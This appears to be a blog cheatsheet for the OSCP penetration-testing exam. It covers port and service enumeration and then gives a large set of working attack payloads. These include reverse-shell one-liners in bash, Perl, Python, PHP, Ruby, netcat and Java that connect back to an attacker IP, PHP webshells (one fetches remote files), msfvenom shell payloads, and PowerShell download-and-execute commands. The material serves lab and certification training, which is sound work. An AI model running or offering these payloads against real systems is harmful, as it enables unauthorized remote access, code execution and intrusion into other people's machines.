Preparing for the OSCP (Offensive Security Certified Professional) exam can feel like a daunting task, but having a handy cheatsheet can make a world of difference. Whether you’re just starting out or brushing up on your skills, this cheatsheet is designed to give you quick access to essential commands, tools, and techniques you’ll need to tackle the OSCP exam.

Let’s dive in and make your OSCP journey a little smoother and a lot more manageable!

General Enumeration – Nmap

Replace $ip with target IP

Initial scan

 nmap -Pn -n -vvv -oN nmap/initial $ip

If no ports are found, scan in parts

 nmap -Pn -n -vvv -p1-500 -oN nmap/partial $ip

Scan all ports

 nmap -Pn -n -vvv -p- -oN nmap/allports $ip

Targeted scanning

 nmap -Pn -n -vvv -p22,80 -oN nmap/targeted $ip

UDP Scanning

sudo nmap -Pn -n -vvv -sU -oN nmap/udp $ip

Automated nmap scanning (my preference is nmapAutomator, never missed a port)

# It is recommended to scan ONE IP at a time
# Do NOT overload the network
# All scans, consecutively: Quick, Targeted, UDP, All ports, Vuln scan, CVE scan, Gobuster, Nikto
 nmapAutomator ip All
 telnet ip port
 nc -nv ip port
 curl -iv $ip

Port 21 – FTP

Nmap script scanning – will reveal anonymous access

 nmap -Pn -n -vvv -p21 -sC -sV $ip

Checking anonymous access manually

 ftp ip
ftp> USER anonymous
ftp> PASS anonymous

Easy view of FTP content – Browse to:

ftp://$ip

Uploading a binary or webshell

ftp> binary
ftp> put file/name

Port 22 – SSH

Additional banner grabbing

 ssh root@$ip

Port 53 – DNS

# Get nameservers and domain name of the IP address
nslookup
nslookup> server $target_ip
nslookup> $target
# o/p: ns1.example.com

# Get all sub-domains
host -l -a example.com $target_ip # or ns1.example.com

Port 79 – Finger

Run this script with following wordlist

/usr/share/metasploit-framework/data/wordlists/unix_users.txt

Port 80/443 – HTTP(S)

Get web server, version, potential OS

curl -i http://ip

Use Wappalyzer to identify technologies, web server, OS, database server deployed

View-Source of pages to find interesting comments, directories, technologies, web application being used, etc.

Finding hidden content Scanning each sub-domain and interesting directory is a good idea

# Use small common wordlist first
# Use big wordlist next
# Use CMS specific wordlist if one is found
gobuster dir -u http://$ip -w /wordlist -o gobust.out
# Find technology specific content
gobuster dir -u http://$ip -w /wordlist -o gobust_php.out -x php
# Find hidden notes, readme, changelog
gobuster dir -u http://$ip -w /wordlist -o gobust_txt.out -x txt

Files to browse manually

/robots.txt
/sitemap.xml
# Make it throw an error
/doesnotexist

Run web server scanning

# Identifies CMS
# Identifies Shellshock
nikto -host $ip -o nikto.txt

Web application-specific scanning WordPress, use API

wpscan --url http://$ip -e p,t,u --detection-mode aggressive > wpscan.log

Drupal, found here

droopescan scan drupal http://$ip -t 32

Port 110 – POP3

# Login
telnet $ip 110
USER test
PASS test

# List and view mails
# O/P: <mail_number> <mail_length>
list
# View mail
retr <mail_number>
quit

Port 139/445 – SMB

General enumeration

nmap -Pn -n -p139,445 --script smb-* $ip
enum4linux -a $ip

Enumerate hostname

nmblookup -A $ip

Get version – script available here

./smbver.sh $ip [port]
msf>use auxiliary/scanner/smb/smb_version

List shares Note: smbmap will state access type available, smbclient will NOT. To check access type using smbclient, it’s best to access each share, read a file, and write a file.

smbmap -H $ip
# Get share items recursively
smbmap -H $ip -R <share>
smbmap -H $ip -d <domain> -u <user> -p <password>
smbclient -L \\$ip -N
# Protocol Error?
smbclient -L \\$ip -N --option='client min protocol=NT1'
smbclient -L \\$ip -U <user>

Connecting to a share

# Anonymously
smbclient //$ip/share -N
# Authenticated
smbclient //$ip/share -U <username>
# Protocol Error?
smbclient //$ip/share -N --option='client min protocol=NT1'

Port 161 – SNMP

MIB ValuesWindows Parameters
1.3.6.1.2.1.25.1.6.0System Processes
1.3.6.1.2.1.25.4.2.1.2Running Programs
1.3.6.1.2.1.25.4.2.1.4Processes Path
1.3.6.1.2.1.25.2.3.1.4Storage Units
1.3.6.1.2.1.25.6.3.1.2Software Name
1.3.6.1.4.1.77.1.2.25User Accounts
1.3.6.1.2.1.6.13.1.3TCP Local Ports
# Brute force community strings
# echo public > community
# echo private >> community
# echo manager >> community
# for ip in $(seq 1 254);do echo 10.11.1.$ip;done > snmp-ips
onesixtyone -c community -i snmp-ips

# Enumerate entire MIB tree
snmpwalk -c public -v1 $ip
# Enumerate specific MIB Value
snmpwalk -c public -v1 $ip $MIB_Value

snmp-check $ip

Port 2049 – NFS

# NFS < v4
# Enumerating shares available, and mount points
showmount -e $ip
showmount -a $ip

# Mounting, x = NFS Version
mount -t nfs -o vers=x $ip:<share> <local_dir>

# On target machine
# Find mount points on the target where SUID programs and scripts can be run from
mount | grep 'nosuid\|noexec'

Shells / Payloads

Universal Listeners

# Netcat
[sudo] rlwrap nc -nvlp <port>

# msf multi/handler
msf(exploit/multi/handler)> set payload path/to/payload
msf(exploit/multi/handler)> set LHOST <ip> # or <interface>
msf(exploit/multi/handler)> set LPORT <port>

Linux


One-liners

Credit to Pentest Monkey

# bash
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/443 0>&1"

# Perl
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP
php -r '$sock=fsockopen("10.10.10.10",443);exec("/bin/sh -i &3 2>&3");'

# Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",443).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'

# Netcat : -u for UDP
nc [-u] 10.10.10.10 443 -e /bin/bash

# Netcat without -e : -u for UDP
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [-u] 10.10.10.10 443 > /tmp/f

# Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5/dev/tcp/10.10.10.10/443;cat &5 >&5; done"] as String[])
p.waitFor()

Reverse shell scripts

PHP reverse shell available here or locally /usr/share/webshells/php/php-reverse-shell

Python PTY shells available here

Windows

PowerShell reverse shell available here PHP reverse shell available Netcat for Windows available here

# PowerShell
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
vi shell.ps1
# go to end of file, paste the following
Invoke-PowerShellTcp -Reverse -IPAddress [attacker_ip] -Port [attacker_port]
# close, reverse shell ready to use

# Netcat - use x64 or x32 as per target. powershell.exe or cmd.exe
nc.exe x.x.x.x <port> -e powershell.exe

PHP Webshells

# Basic. system() or shell_exec() or exec()
<?php system($_GET['cmd']);?>

# More functional
<?php
$ip = 'http://10.10.14.4/' # [:port] . Change this
# Upload
if (isset($_GET['fupload'])) {
    file_put_contents($_GET['fupload'], file_get_contents($ip . $_GET['fupload']));
};
# Execute code
# shell_exec() or system() or exec()
if (isset($_GET['cmd'])) {
    echo "<pre>" . exec($_GET['cmd']) . "</pre>";
};
?>

Metasploit

System Binaries

# Linux reverse shell - Staged
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell
# Linux reverse shell - Stageless
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell

# Windows reverse shell - Staged
msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe
# Windows reverse shell - Stageless
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe

Web

# PHP
msfvenom -p php/reverse_php

# ASPX
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f aspx -o shell.aspx

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw -o shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war -o shell.war

Shellcode

Select appropriate architecture

# Linux Staged - use python or c
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Linux Stageless - use python or c
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

# Windows Staged - use python or c
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Windows Stageless - use python or c
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

Upgrading your shell – Linux

Upon initial access, it is crucial to achieve the highest functional shell possible for privesc purposes!

# On victim machine
which python[3]
python[3] -c 'import pty;pty.spawn("/bin/bash")'
# background the listener using ctrl+z
stty -a # notice the number of rows and columns
stty raw -echo
# foreground the process: type fg, press enter
stty rows xx
stty columns xxx
export TERM=xterm-256color

File Transfers

Server

# HTTP - Apache2
# cp file /var/www/html/file_name
sudo service apache2 start

# HTTP - Python. Default port 8000
# python2
sudo python -m SimpleHTTPServer 80
# python3
sudo python3 -m http.server 80

# SMB
sudo impacket-smbserver <share_name> <path/to/share>

# FTP
# apt-get install python-pyftpdlib
sudo python -m pyftpdlib -p 21

# TFTP (UDP)
sudo atftpd --daemon -port 69 /path/to/serve

# Netcat
nc -nvlp <port> < file/to/send

Linux – HTTP

# Wget
wget http://<ip>/file_name -O /path/to/save/file

# Netcat
nc -nv <ip> <port> > file/to/recv

# cURL
curl http://<ip>/file_name --output file_name

Windows

  • HTTP
# Does not save file on the system
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/<file_name>')"
# Saves file on the system
powershell.exe -nop -ep bypass -c "iwr -uri http://<ip>/<file_name> -outfile path/to/save/file_name"
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadFile('http://<ip>/<file_name>','path/to/save/file_name')"

certutil.exe -urlcache -split -f http://<ip>/file file_save
* Wget.ps1
echo $storageDir = $pwd >> wget.ps1
$webclient = New-Object System.Net.WebClient >> wget.ps1
# Download file from
$url = "http://<ip>/file_name" >> wget.ps1
# Save file as
$file = "file_name"
echo $webclient.DownloadFile($url,$file) >>wget.ps1
# execute the script as follows
powershell.exe -nop -ep bypass -nol -noni -f wget.ps1

  • TFTP (UDP)
tftp -i <ip> get file_name

  • SMB
# cmd.exe
net use Z: \\<attacker_ip>\share_name
# To access the drive
Z:
# PowerShell
New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\attacker_ip\share_name"
# To access the drive
notmalicious:
  • FTP
ftp <ip>
ftp>binary
ftp>get file_name

# One-liner downloader
# in cmd.exe do not use quotes in an echo command
echo open <ip> >> download.txt
echo anonymous >> download.txt
echo anon >> download.txt
echo binary >> download.txt
get file_name >> download.txt
bye >> download.txt
ftp -s:download.txt

Port Forwarding

Linux

  • Local port forwarding
ssh <gateway> -L <local_port_to_listen_to>:<remote_host>:<remote_port>
  • Remote port forwarding
ssh <gateway> -R <remote_port>:<local_host>:<local_port>
  • Dynamic port forwarding
ssh -D <local proxy port> -p <remote port> <target>

Windows

Chisel is a port forwarding tool for Linux as well as Windows, works over HTTP, and can be found here.

# On KALI
./chisel server --reverse --port 9001
# On Windows
.\chisel.exe client KALI_IP:9001 R:KALI_PORT:127.0.0.1:WINDOWS_PORT

Shares:

Leave a Reply

Your email address will not be published. Required fields are marked *